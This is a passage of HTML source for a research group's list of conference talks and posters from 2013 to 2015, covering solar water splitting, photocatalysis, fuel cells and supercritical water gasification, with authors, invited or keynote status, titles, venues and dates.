Conference on Energy Materials Nanotechnology (EMN East), Beijing, China, April 2015
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>1-D
metal oxide nanomaterials for efficient solar water splitting</strong>”, 8<sup>th</sup>
International Conference on Energy Materials Nanotechnology (EMN East), Symposium on
Nanomaterials
& Nanotechnology, Beijing, China, April 2015
</li>
<li>
<STRONG>L. Vayssieres </STRONG><span class="invited">(<STRONG>Plenary</STRONG>)</span>,
“<strong>Confinement effects in large bandgap oxide semiconductors</strong>”,
8<sup>th</sup> International Conference on Energy Materials Nanotechnology (EMN East), Beijing,
China, April 2015
</li>
<li>
<strong>M.C. Liu </strong><span class="invited">(</span><strong><span
class="invited">Invited</span></strong><span
class="invited">)</span>, “<strong>Twin-induced ordered homojunction for efficient solar
hydrogen production</strong>”, 8<sup>th</sup> International Conference on Energy Materials
Nanotechnology (EMN East), Beijing, China, April 2015
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited</strong> <strong>talk & Session chair</strong>)</span>,
“<strong>Advanced growth control of oxide nanostructures in water</strong>”, 2015
MRS
Spring Meeting, Symposium RR: Solution Syntheses of Inorganic Functional/Multifunctional
Materials,
San Francisco, CA, USA, April 2015
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Interfacial engineering of large bandgap oxide nanostructures for solar energy
conversion</strong>”, 2015 MRS Spring Meeting, Symposium FF: Defects in
Semiconductors-Relationship to Optoelectronic Properties, San Francisco, CA, USA, April 2015
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Advanced low cost energy materials from aqueous solutions</strong>”, 2015
MRS
Spring Meeting, Symposium X: Frontiers of Materials Research, San Francisco, CA, USA, April 2015
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Quantum size effects in Anatase
TiO</strong><strong><sub>2</sub> nanoparticles</strong>”, 2015 MRS Spring Meeting,
Symposium
UU: Titanium Oxides-From Fundamental Understanding to Applications, San Francisco, CA, USA,
April
2015
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Metal oxide (hetero)nanostructures: Surface chemistry, interfacial electronic
structure, dimensionality effect and efficiency optimization</strong>”, 2015 MRS Spring
Meeting, Symposium TT: Metal Oxides-From Advanced Fabrication and Interfaces to Energy and
Sensing
Applications, San Francisco, CA, USA, April 2015
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<strong>Nanorod
structured hematite photoanodes: metal doping and surface engineering towards efficient solar
water
splitting</strong>”, 2015 MRS Spring Meeting & Exhibit, Symposium J: Latest Advances in
Solar
Water Splitting, San Francisco, CA, USA, April 2015<BR>
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the effects of surface and dimensionality of oxide photocatalysts for water
splitting</strong>”, 249<sup>th </sup>American Chemical Society National Meeting &
Exposition, Symposium on Nanostructured Materials for Solar Energy Conversion and Storage,
Denver,
CO, USA, March 2015
</li>
<li>
<U><strong>Y. Hu</strong></U>, <strong>S.H. Shen</strong> <span
class="invited">(</span><strong><span class="invited">Invited</span></strong><span
class="invited">)</span>, <strong>M.C. Liu</strong>, “<strong>1D nanostructures design
for
efficient solar water splitting</strong>”, 249<sup>th</sup> American Chemical Society
National
Meeting & Exposition, Symposium on Nanostructured Materials for Solar Energy Conversion and
Storage, Denver, CO, USA, March 2015<BR>
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Low cost quantum-confined oxide arrays for solar water splitting</strong>”,
American Ceramic Society Materials Challenges in Alternative & Renewable Energy
2015, Symposium on Hydrogen Energy: Water Splitting & Energy Application, Jeju, South Korea,
February 2015
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<strong>Metal
doping and surface engineering for efficient solar water splitting over hematite nanorod
photoanodes</strong>”, Materials Challenges in Alternative & Renewable Energy (MCARE 2015),
Symposium 1: Hydrogen Energy-Water Splitting and Energy Application, Jeju, South Korea, February
2015
</li>
<li>
<strong><u>M.C. Liu</u></strong>,<strong> N.X. Li</strong>, <strong>Z.H. Zhou</strong>,<strong>
J.C.
Zhou</strong>,<strong> Y.M. Sun</strong>,<strong> L.J. Guo</strong>, “<strong>Using
photooxidative
etching as a new approach to the determination of charge separation in faceted chalcogenide
photocatalysts</strong>”, Materials Challenges in Alternative & Renewable Energy (MCARE
2015),
Jeju, South Korea, February 2015
</li>
<li>
<strong><u>M. Wang</u></strong>, M. Pyeon, Y. Gönüllü, A. Kaouk,<strong> S. H.
Shen</strong>,<strong> S. Mathur</strong>, <strong>and L. J. Guo</strong>, “<strong>Double
Layered
TiO<sub>2</sub>@Fe<sub>2</sub>O<sub>3</sub> Photoelectrodes with “Z-Scheme” Structure for
Efficient
Photoelectrochemical (PEC) Water Splitting</strong>”, Materials Challenges in Alternative &
Renewable Energy (MCARE 2015), Jeju, South Korea, February 2015
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<strong>Surface
engineered doping of hematite nanorod arrays for efficient solar water splitting</strong>”,
39<sup>th</sup>
International Conference and Expo on Advanced Ceramics and Composites, Symposium 7:
9<sup>th</sup>
International Symposium on Nanostructured Materials: Innovative Synthesis and Processing of
Nanostructured, Nanocomposite and Hybrid Functional Materials for Energy, Health and
Sustainability,
Daytona Beach, Florida, USA, January 2015
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2014 (52)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="148">
<li>
<strong>L.J. Guo</strong>, Advanced Innovation and development Symposium of Energy and Chemical
Industry, Xi’an, Shaanxi, China, December 2014
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>, “<strong>Low
Cost Metal Oxides for Solar Water Splitting: Quantum Confinement Effects, Interfacial Electronic
Structure and Aqueous Surface Chemistry</strong>”, 2014 MRS Fall Meeting, Symposium V:
Sustainable Solar-Energy Conversion Using Earth-Abundant Materials, Boston, MA, USA, November
2014
</li>
<li>
<strong>L.J. Guo</strong> <span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>The fundamental research of large-scale hydrogen production utilizing solar
energy</strong>”,
15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup> Hydrogen Energy Seminar
for
the Chinese mainland, Hong Kong, Macao and Taiwan, Symposium A on Hydrogen Production Technology
and
Its Application like Using Renewable energy, Chemical technology and others, Shanghai, China,
November 2014
</li>
<li>
<strong><u>Z.W. Ge</u></strong> <span class="invited">(<strong>Invited</strong>)</span>,
<strong>L.J.
Guo*</strong>, <strong>X.M. Zhang</strong>, <strong>S.K. Liu</strong>, <strong>H.
Jin</strong>,
“<strong>Hydrogen production by coal gasification in supercritical water with a novel fluidized
bed
gasifier</strong>”, 15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup>
Hydrogen
Energy Seminar for the Chinese mainland, Hong Kong, Macao and Taiwan, Shanghai, China, November
2014
</li>
<li>
<strong><u>X.J. Guan</u></strong>, <strong>L.J. Guo*</strong>, “<strong>Fabrication of
TiO<sub>2</sub>/Ag<sub>3</sub>PO<sub>4</sub> composite for enhanced water oxidation</strong>”,
15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup> Hydrogen Energy Seminar
for
the Chinese mainland, Hong Kong, Macao and Taiwan, Shanghai, China, November 2014
</li>
<li>
<strong><u>L.J. Ma</u></strong>, <strong>M.C. Liu</strong>, <strong>L.J. Guo</strong>, “<strong>Photocatalytic
hydrogen production over CdS: Effects of reaction atmosphere studied by in situ Raman
spectroscopy</strong>”, 15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup>
Hydrogen Energy Seminar for the Chinese mainland, Hong Kong, Macao and Taiwan, Shanghai, China,
November 2014
</li>
<li>
<strong><u>J.B. Huang</u></strong>, <strong>L.J. Guo</strong>,
“<strong>BaZr<sub>0.1</sub>Ce<sub>0.7</sub>Y<sub>0.2</sub>O<sub>3-δ </sub>mixed with alkali
carbonates for low temperature SOFC applications: insight into stability</strong>”,
15<sup>th</sup>
National Conference on Hydrogen Energy-7<sup>th</sup> Hydrogen Energy Seminar for the Chinese
mainland, Hong Kong, Macao and Taiwan, Shanghai, China, November 2014
</li>
<li>
<strong><u>H. Jin</u></strong>, <strong>L.J. Guo</strong>, <strong>S.K. Liu</strong>, “<strong>Experimental
investigation on the key intermediates in the coal gasification process in supercritical
water</strong>”, 15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup> Hydrogen
Energy Seminar for the Chinese mainland, Hong Kong, Macao and Taiwan, Shanghai, China, November
2014
</li>
<li>
<strong><u>G.Y. Chen</u></strong>, <strong>L.J. Guo</strong>, <strong>H.T. Liu</strong>,
“<strong>Effect
studied of Microporous layers on water management of the proton exchange membrane fuel using
current
distribution method cell</strong>”, 15<sup>th</sup> National Conference on Hydrogen
Energy-7<sup>th</sup> Hydrogen Energy Seminar for the Chinese mainland, Hong Kong, Macao and
Taiwan,
Shanghai, China, November 2014<br>
</li>
<li>
<strong><u>B. Wang</u></strong>, <strong>M.C. Liu</strong>, <strong>L.J. Guo</strong>,
“<strong>All Surface Active Sites</strong><strong>:The Role of the Cocatalyst</strong>”,
15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup> Hydrogen Energy Seminar
for
the Chinese mainland, Hong Kong, Macao and Taiwan, Shang Hai, China, November 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Dimensionality effects in oxide semiconductors</strong>”, 2<sup>nd</sup>
International Conference of Young Researchers on Advanced Materials (IUMRS-ICYRAM), Symposium on
Energy Conversion-Photocatalysis, Fuel Cells & Solar Cells, Hainan International Convention
& Exhibition Center, Haikou, Hainan Province, China, October 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Interfacial Engineering for Efficient Solar Water Splitting</strong>”,
226<sup>th</sup> Electrochemical
Society (ECS) Fall Meeting, Symposium on Solar Fuels, Photocatalysts & Photoelectrochemical
Cells, Cancun, Mexico, October 2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Functionalized
modification to g-C<sub>3</sub>N<sub>4</sub> for efficient photocatalytic hydrogen generation:
Enhanced optical absorption and promoted charge separation</strong>”, IUPAC
10<sup>th</sup>
International Conference on Novel Materials and their Synthesis, Zhengzhou, China, October 2014
</li>
<li>
<strong><u>D.M. Zhao</u></strong>,<strong> J. Chen</strong>,<strong> S.H. Shen</strong>,
<strong>L.J.
Guo</strong>, “<strong>Enhanced Photocatalytic Activity for Hydrogen Evolution over
g-C<sub>3</sub>N<sub>4</sub> Modified by Ti Activated MCM-41 Mesoporous Silica</strong>”,
1<sup>st </sup>International Symposium on Catalytic Science and Technology in Sustainable Energy
and
Environment (EECAT-2014), Tianjin, China, October 2014
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Keynote lecture & Session chair</strong>)</span>,
“<strong>Interfacial
electronic structure & confinement effects for low-cost solar water splitting</strong>”,
SPIE Optics & Photonics, Symposium on Solar Hydrogen & Nanotechnology IX, San Diego, CA,
August 2014
</li>
<li>
<u><strong>J.Z. Su</strong></u> <span class="invited">(<strong>Invited</strong>)</span>,<strong>
Y.K. Wei</strong>, <strong>L.J. Guo</strong>, “<strong>A novel Co-Pi capped pyramidal
BiVO<sub>4</sub> nanorod arrays with enhanced solar water oxidation</strong>”, SPIE Optics
& Photonics, Symposium on Solar Hydrogen & Nanotechnology IX, San Diego, CA, August 2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>N-doped
ZnO nanorod arrays with gradient band structure for photoelectrochemical water
splitting</strong>”,
SPIE Solar Energy + Technology conference 2014, San Diego, CA, August 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="invited_cited_blue">Keynote</strong>)</span>, “<strong>Oxide
Heteronanostructures
for Solar Water-Splitting</strong>”, 248<sup>th</sup> American Chemical Society National
Meeting & Exposition, 1<sup>st</sup> USA-China Symposium on Energy, San Francisco, CA,
August
2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Engineered
doping to metal oxide nanorod arrays for improved photoelectrochemical water splitting
activity</strong>”, 248<sup>th</sup> American Chemical Society National Meeting &
Exposition, San Francisco, CA, August 2014
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Keynote lecture & Session chair</strong>)</span>,
“<strong>Recent Advances in Quantum-confined all-Oxide Heteronanostructures for Solar
Water-Splitting</strong>”, 6<sup>th</sup> International Symposium on Functional Materials,
Singapore, August 2014
</li>
<li>
<strong><u>Z.H. Zhou</u></strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>Electronic structure of Ti and Sn doped hematite
(Fe<sub>2</sub>O<sub>3</sub>)</strong>”, 14<sup>th</sup> Solar Energy Photochemistry and
Photocatalysis Conference, Haerbin, China, August 2014
</li>
<li>
Y. Lei, B.W. Zhang, <strong>B.F. Bai</strong>, T.S. Zhao, “<strong>An 1-D Model for
Species
Crossover Through the Membrane in All-Vanadium Redox Flow Batteries</strong>”, The
15<sup>th</sup> International Heat Transfer Conference, Kyoto, Japan, August 2014
</li>
<li>
B.W. Zhang, Y. Lei, <strong>B.F. Bai</strong>, T.S. Zhao, “<strong>Numerical Investigation
of
Thermal Management for Kilowatt Vanadium Redox Flow Batteries</strong>”, The
15<sup>th</sup>
International Heat Transfer Conference, Kyoto, Japan, August 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="invited_cited_blue">Keynote</strong>)</span>, “<strong>Low cost water
splitting oxide heteronanostructures</strong>”, 22<sup>nd</sup> International Conference
on
Composites & Nano Engineering, Malta, July 2014
</li>
<li>
<strong>L.J. Guo</strong> <span
class="invited">(<strong>Keynote lecture & Session chair</strong>)</span>, “<strong>Solar
hydrogen: On material design and pilot-scale demonstration</strong>”, The 5<sup>th</sup>
Australia-China Conference on Science, Technology and Education and The 5<sup>th</sup>
Australia-China Symposium for Materials Science, Wollongong, Australia, July 2014
</li>
<li>
<strong><u>C. Zhang</u></strong>, C. Wang, S.J. Zhang, <strong>L.J. Guo</strong>, “<strong>The
effects of hydration activity of calcined dolomite on the silicothermic reduction
process</strong>”,
The Second Australia-China Joint Symposia on Minerals and Metallurgy, Sydney, Australia, July
2014
</li>
<li>
<strong>L.J. Guo</strong> <span class="invited">(<strong>Keynote</strong>)</span>, “<strong>The
progress in theoretical and experimental investigation of </strong>“<strong>boiling coal in
supercritical water to H<sub>2</sub> and Pure CO<sub>2</sub></strong>”<strong>
technology</strong>”,
2014 International Symposium on Frontiers of Technology for the Future: Low Carbon Energy and
Life
(FoTEL 2014), Hsinchu, Taiwan, June 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Interfacial chemistry and electronic structure of quantum-confined oxide
heteronanostructures for solar water splitting</strong>”, 3<sup>rd</sup> International
Conference on New Advances in Materials Research for Solar Fuels Production, Montreal, Canada, June
2014
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>N ion implanted ZnO nanorod arrays: engineered band
structure for improved photoanodic performances</strong>”, International Conference on Clean
Energy
(ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>J.W. Shi</u></strong>, <strong>L.J. Guo</strong>, “<strong>Novel
ABO<sub>3</sub>-based
photocatalysts for water splitting under visible-light irradiation</strong>”, International
Conference on Clean Energy (ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>J.Z. Su</u></strong>, <strong>C. Liu</strong>,<strong> L.J. Guo</strong>,
“<strong>Different
metal element doped hematites and their electronic characterizations for solar water splitting
application</strong>”, International Conference on Clean Energy (ICCE2014), Istanbul,
Turkey,
June 2014
</li>
<li>
<strong><u>G.Y. Chen</u></strong>, <strong>H.T. Liu</strong>, <strong>L.J. Guo</strong>,
“<strong>Effects of micro-porous layer under wide operating conditions in proton exchange
membrane fuel cell</strong>”, International Conference on Clean Energy (ICCE2014),
Istanbul,
Turkey, June 2014
</li>
<li>
<strong><u>X.Q. Wang</u></strong>, <strong>H.H. Yang</strong>, <strong>Z. Yang</strong>,
<strong>L.J.
Guo*</strong>, “<strong>Remarkable enhancement on hydrogen production performance of
Rhodobacter sphaeroides by disruption of spbA and hupSL genes</strong>”, International
Conference on Clean Energy (ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>F. Jia</u></strong>, <strong>F.F. Liu</strong>,<strong> L.J.
Guo</strong>,<strong> </strong>H.T. Liu, “<strong>Reverse current during start-up in PEM
fuel-cells</strong>”,<strong> </strong>International Conference on Clean Energy
(ICCE2014),
Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>Z.W. Ge</u></strong>,<strong> H. Jin</strong>, <strong>L.J. Guo</strong>,
“<strong>Hydrogen
production by catalytic gasification of coal in supercritical water with alkaline catalysts:
Explore
the way to complete gasification of coal</strong>”, International Conference on Clean
Energy
(ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>B. Wang</u></strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>Facile synthesis of high-indexed SrTiO<sub>3</sub> single-crystal photocatalysts
for
photocatalytic H<sub>2</sub> and O<sub>2</sub> evolution</strong>”, International
Conference
on Clean Energy (ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>X.J. Guan</u></strong>, <strong>L.J. Guo</strong>, “<strong>Synthesis and
characterization of SrTiO<sub>3</sub>/Ag<sub>3</sub>PO<sub>4</sub> composite for efficient
photocatalytic O<sub>2</sub> evolution under visible-light irradiation</strong>”,
International Conference on Clean Energy (ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>X.X. Wang</u></strong>, <strong>J. Chen</strong>, <strong>X.J. Guan</strong>,
<strong>L.J.
Guo</strong>, “<strong>Enhanced efficiency and stability for visible light driven
water
splitting hydrogen production over
Cd<sub>0.5</sub>Zn<sub>0.5</sub>S/g-C<sub>3</sub>N<sub>4</sub>
composite photocatalyst</strong>”, International Conference on Clean Energy (ICCE2014),
Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>J. Chen</u></strong>, <strong>Y.C. Du</strong>, <strong>S.H. Shen</strong>, <strong>L.J.
Guo</strong>, “<strong>Distance modulated plasmonic enhancement in visible light
photocatalytic activity for hydrogen evolution over Ag@SiO<sub>2</sub> modified
g-C<sub>3</sub>N<sub>4</sub></strong>”, International Conference on Clean Energy
(ICCE2014),
Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>J. Wang</u></strong>, <strong>N. Zhang</strong>, <strong>L.J. Guo</strong>,
“<strong>Facile synthesis of highly monodisperse α-Fe<sub>2</sub>O<sub>3</sub> quantum
dots
for Water Oxidation</strong>”, International Conference on Clean Energy (ICCE2014),
Istanbul,
Turkey, June 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="invited_cited_blue">Invited talk & Session chair</strong>)</span>,
“<strong>Confinement effects for efficient solar water splitting</strong>”,
7<sup>th</sup>
International Conference on Energy Materials Nanotechnology, Beijing, China, May 2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Engineered
Impurity Distribution in ZnO Nanorod Arrays for Photoanodic Water Oxidation</strong>”,
2014
EMN East Meeting, Beijing, China, May 2014
</li>
<li><strong>L. Vayssieres </strong><span class="invited">(<strong class="invited_cited_blue">Invited talk & Session chair</strong>)</span>,
“<strong>Quantum-confined oxide heteronanostructures by aqueous design</strong>”,
2014
MRS Spring Meeting, Symposium RR: Solution Synthesis of Inorganic Functional Materials, San
Francisco, CA, USA, April 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Low-cost oxide
heteronanostructures for solar water splitting</strong>”, UNESCO International Workshop on
Materials & Technologies for Energy Conversion, Saving & Storage, Montreal, Quebec,
Canada,
April 2014
</li>
<li>
<strong>L. Vayssieres</strong><span class="invited"> (<strong class="invited_cited_blue">Invited talk & Session chair</strong>)</span>,
“<strong>Low cost quantum-confined oxide heteronanostructures</strong>”, Nano &
Giga
Challenges in Electronics, Photonics and Renewable Energy: From Materials to Devices to System
Architecture, Phoenix, AZ, March 2014
</li>
<li>
<strong><u>S.H. Shen</u></strong><span class="invited"> (<strong
class="invited_cited_blue">Invited</strong>)</span>, <strong>M. Wang</strong>,
“<strong>Doping
to metal oxide nanorod arrays: Engineered electronic property and band structure for improved
photoanodic performances</strong>”, 247<sup>th</sup> ACS National Meeting &
Exposition,
Symposium on Nanostructured Materials for Solar Energy Conversion and Storage, Dallas, USA,
March
2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Doping
to ZnO nanorod arrays by ion implantation method: Engineered band structure and visible light
photoelectrochemical water splitting</strong>”, 2014 EMN Spring Meeting, Las Vegas, NV,
February-March 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="invited_cited_blue">Invited talk & Session chair</strong>)</span>,
“<strong>Advances in quantum confinement effects and interfacial electronic structure for
solar water splitting</strong>”, American Ceramic Society Materials Challenges in
Alternative
& Renewable Energy 2014 Conference, Clearwater, FL, February 2014
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Plenary Lecture & Session chair</strong>)</span>,
“<strong>All-Oxide Heteronanostructures For Solar Hydrogen Generation</strong>”,
Molecules and Materials for Artificial Photosynthesis Fusion Conference, Cancun, Mexico,
February
2014
</li>
<li>
<strong>L.J. Guo</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<strong>The
progress in theoretical and experimental investigation of ‘boiling coal in supercritical water
to
H<sub>2</sub> and Pure CO<sub>2</sub>’ technology</strong>”, Asian Pacific Conference on Energy
and
Environmental Materials (APCEEM), Gold Coast, Queensland, Australia, February 2014
</li>
<li>
<strong><u>M.C. Liu</u> </strong><span class="invited">(<strong>Invited</strong>)</span>,
<strong>L.J.
Guo</strong>, “<strong>Solar hydrogen: harvesting light and heat from sun</strong>”, 6<sup>th</sup>
Sino-Thai Workshop on Renewable Energy, Guangzhou, China, January 27-30, 2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, “<strong>Doped and Core/shell
Structured Hematite Nanorods for Efficient Solar Water Splitting</strong>”,
38<sup>th</sup> International
Conference and Exposition on Advanced Ceramics and Composites, Symposium 7: 8<sup>th</sup> International
Symposium on Nanostructured Materials and Nanocomposites, Daytona Beach, FL, USA, January 2014
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2013 (46)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="96">
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Invited
talk & Session chair</strong>)</span>, “<strong>Aqueous chemical growth of advanced
heteronanostructures</strong>”, 12<sup>th</sup> International Conference
on Frontiers of Polymers & Advanced Materials, Auckland, New Zealand, December
2013
</li>
<li>
<strong><u>S.H. Shen</u></strong> <span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>, <strong>L.J. Guo</strong>, S. S. Mao,
“<strong>Solution-based hematite nanorods with ultrathin overlayer for efficient
photoelectrochemical water splitting</strong>”, 2013 MRS Fall Meeting & Exhibit,
Symposium
Z: Sustainable Solar-Energy Conversion Using Earth-Abundant Materials, Boston, USA, December
2013
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,
“<strong>Advanced Low cost Heteronanostructures for Solar Water Splitting</strong>”,
Swedish-Chinese Workshop on Renewable Energy: From Fundamentals to Applications,
Uppsala University, Uppsala, Sweden, November 2013
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, “<strong>All-oxide
quantum-confined heteronanostructures</strong>”, 2<sup>nd</sup> General Meeting
of the European Cooperation in Science & Technology, Chemistry and Molecular
Sciences and Technologies on Reducible Oxide Chemistry, Structure &
Functions, Uppsala University, Angstrom Laboratory, Siegbahn Hall, Uppsala, Sweden,
November 2013
</li>
<li>
<strong><u>J.N. Chen</u></strong>,<strong> M. Wang</strong>,<strong> S.H. Shen</strong>,<strong>
L.J
Guo</strong>, “<strong>Au@SiO<sub>2</sub> core/shell nanoparticles decorated
TiO<sub>2</sub>
nanorod arrays for enhanced photoelectrochemical water splitting</strong>”, The
18<sup>th</sup> International Conference on Semiconductor Photocatalysis and Solar Energy
Conversion
(SPASEC-18), San Diego, California, USA , November 2013
</li>
<li>
<strong><u>S.H. Shen</u></strong>, <strong>J. Chen</strong>,<strong> X.X. Wang</strong>,<strong>
L.J. Guo</strong>, “<strong>Visible Light Activation of MCM-41 Mesoporous Silica by
Transition-Metal Incorporation for Photocatalytic Hydrogen Production</strong>”, The
18<sup>th</sup> International Conference on Semiconductor Photocatalysis and Solar Energy
Conversion
(SPASEC-18), San Diego, California, USA, November 2013
</li>
<li>
<strong><u>J.Z. Su</u></strong>, <strong>L. Wang</strong>,<strong> L.J. Guo</strong>,
“<strong>Enhanced Photoelectrochemical Water Splitting Using
BiVO<sub>4</sub>/CeO<sub>2</sub>
Nanostructural Heterojunction</strong>”, The 18<sup>th</sup> International Conference on
Semiconductor Photocatalysis And Solar Energy Conversion (SPASEC-18), San Diego, California,
USA,
November 2013
</li>
<li>
<strong><u>R. Xie</u></strong>, <strong>J.Z. Su</strong>, <strong>L.J. Guo</strong>,
“<strong>Optical,
Structural and Photoelectrochemical Properties of Ag<sub>2</sub>S Modified CdS Nanorods
Arrays</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis
And Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November 2013<br>
</li>
<li>
<strong><u>Y.M. Fu</u></strong>, <strong>S.H. Shen</strong>,<strong> L.J. Guo</strong>,
“<strong>Enhanced Photoelectrochemical Performance of Nb-doped Hematite
(α-Fe<sub>2</sub>O<sub>3</sub>) Nanorods Photoanodes for Water Splitting</strong>”, The
18<sup>th</sup> International Conference on Semiconductor Photocatalysis and Solar Energy
Conversion
(SPASEC-18), San Diego, California, USA, November 2013
</li>
<li>
<strong><u>Y. Liu</u></strong>, <strong>M. Wang</strong>, <strong>L.J. Guo</strong>, <strong>M.T.
Li</strong>, “<strong>Preparation of CdSe/TiO<sub>2</sub> Nanfibers Films and Their
Photo-electrochemical Properties for Water Splitting Applicatio</strong>”, The
18<sup>th</sup>
International Conference on Semiconductor Photocatalysis and Solar Energy Conversion
(SPASEC-18),
San Diego, California, USA, November 2013<br>
</li>
<li>
<u><strong>H. Liu</strong></u>,<strong> L.J. Guo</strong>, “<strong>Novel Quantum Yield
Measurement System for Photocatalytic Reaction</strong>”, The 18<sup>th</sup>
International
Conference on Semiconductor Photocatalysis and Solar Energy Conversion (SPASEC-18), San Diego,
California, USA, November 2013
</li>
<li>
<strong><u>L. Cai</u></strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>Synthesis and Photoelectrochemical Properties of Ag@SiO<sub>2</sub>-ZnO Nanowire
Array Film</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis and Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November
2013
</li>
<li>
<strong><u>P.H. Guo</u></strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>Doped ZnO Homojunction for Promoted Photoelectrochemical Water Splitting under
Visible Light</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis and Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November
2013
</li>
<li>
<strong><u>X.K. Wan</u></strong>, <strong>M. Wang</strong>, <strong>L.J. Guo</strong>,
“<strong>Heterojunction CdSe/BiVO<sub>4</sub> Films for Photoelectrochemical Water
Splitting</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis and Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November
2013
</li>
<li>
<strong><u>D.W. Jing</u></strong>, <strong>L.Z. Zhang</strong>, X.D Yao, <strong>L.J.
Guo</strong>,
“<strong>In-Situ Photochemical Synthesis of Zn Doped Cu<sub>2</sub>O Hollow Nanocubes for
High
Efficient H<sub>2</sub> Production by Photocatalytic Reforming of Glucose under Visible
Light</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis
and Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November 2013
</li>
<li>
<strong><u>M.T. Li</u></strong>,<strong> L.J. Guo</strong>, “<strong>A First Principles
Study
on Bi<sub>2</sub>Mo<sub>1-x</sub>W<sub>x</sub>O<sub>6</sub> for Photocatalytic Water Splitting
Application</strong>”, The 18<sup>th</sup> International Conference on Semiconductor
Photocatalysis and Solar Energy Conversion (SPASEC-18), San Diego, California, USA, November
2013
</li>
<li>
<strong>L. Vayssieres<span class="invited"> </span></strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Visible light-active
quantum-confined
all-oxide heteronanostructures</strong>”,2013 Materials Science & Technology
Conference
